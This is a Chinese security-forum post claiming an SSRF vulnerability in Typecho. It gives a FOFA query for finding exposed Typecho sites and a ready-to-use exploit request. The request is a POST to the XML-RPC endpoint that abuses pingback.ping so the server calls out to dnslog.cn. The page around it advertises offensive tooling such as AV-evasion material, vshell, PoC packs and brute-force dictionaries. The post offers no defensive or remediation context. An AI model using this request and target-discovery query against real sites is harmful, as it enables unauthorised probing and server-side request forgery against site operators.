Typecho存在SSRF漏洞

0681109

搜索语句
“`
fofa:”Typecho”

 

### POC&EXP
“`

POST /index.php/action/xmlrpc HTTP/1.1

Content-Length: 263

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

Host:

Connection: Keep-alive

 

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value><string>http://dnslog.cn/</string></value>

</param>

<param>

<value><string>http://192.168.160.147/index.php/archives/10/</string></value>

</param>

</params>

</methodCall>“`

© 版权声明
1 如果您喜欢本站,点击这儿赞助下本站,感谢支持!
2 可能会帮助到你: 下载帮助 | 报毒说明 | 进站必看 | 广告合作
3 本站素材资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责;
4 本站大部分素材资源来源于网络,仅供学习与参考,请于下载后24小时内删除;
5 若作商业用途,请联系原作者授权,若本站侵犯了您的权益请 联系站长 进行删除处理;
6 如若转载,请注明文章出处:
THE END
web渗透
喜欢就支持一下吧
点赞109 分享
Hpny的头像-鹏组安全社区
PassiveRecon-1.8.5-鹏组安全社区
PassiveRecon-1.8.5
PassiveRecon-1.8.5
1个月前 1395
老鑫免杀第二期-鹏组安全社区
老鑫免杀第二期
老鑫免杀第二期
2个月前 1113
山石网科WAF 远程代码执行漏洞-鹏组安全社区
山石网科WAF 远程代码执行漏洞
山石网科WAF 远程代码执行漏洞
2个月前 1081
谢公子内网渗透-鹏组安全社区
谢公子内网渗透
谢公子内网渗透
1个月前 1080
goby红队版poc 截止 24年8月7日240807pocs-鹏组安全社区
goby红队版poc 截止 24年8月7日240807pocs
goby红队版poc 截止 24年8月7日240807pocs
2个月前 1060
vshell最新4.9.3版加4.6-鹏组安全社区
vshell最新4.9.3版加4.6
vshell最新4.9.3版加4.6
1个月前 1019
相关推荐
Poc-Gui扫描器-脚本小子必备神器-2024.10.6-鹏组安全社区
Poc-Gui扫描器-脚本小子必备神器-2024.10.6
Poc-Gui扫描器-脚本小子必备神器-2024.10.6
2个月前 1339
各类爆破字典整理-鹏组安全社区
各类爆破字典整理
各类爆破字典整理
5个月前 1315
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘-鹏组安全社区
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘
【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘
3个月前 1206
自动代码审计工具(只支持php) — Code-audit-鹏组安全社区
自动代码审计工具(只支持php) — Code-audit
自动代码审计工具(只支持php) — Code-audit
4个月前 1174
渗透测试清单大全-鹏组安全社区
渗透测试清单大全
渗透测试清单大全
2个月前 1145
DNSlog原理及其DNSlog平台搭建-鹏组安全社区
DNSlog原理及其DNSlog平台搭建
DNSlog原理及其DNSlog平台搭建
5个月前 1124
评论 抢沙发
头像
超级会员可评论
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    请登录后查看评论内容

新文文档-会员可获得的东西以及付费说明

EHole_magic(指纹识别工具)-更新10月7日

网站及其内容免责声明

逆向工具箱——次元剑

效率小达人的福音! 鹏组安全社区APP正式上线!

灯塔(ARL)一键安装脚本(修复重置版)

PassiveRecon-1.8.5

Mac渗透工具箱 V1.4

大佬开发神器!一键解密|AI分析|区块链溯源|免杀WebShell

Poc-Gui扫描器-脚本小子必备神器-2024.10.6

活动[已结束]-学习工作累了那就来把游戏奖励自己吧

各类爆破字典整理

漏扫集成系统(AWVS、Nessus、QingScan、巡风、Golin…)

Web安全课程

一键化网站扫描脚本-缝合怪扫描脚本

中秋、国庆双节送礼-紫薯芋鹏组社区!

windows应急响应工具-FindAll

【CVND】资本大于5000w公司的公网通用资产查询搜索,方便证书挖掘

2024小D渗透

md5解密查询小工具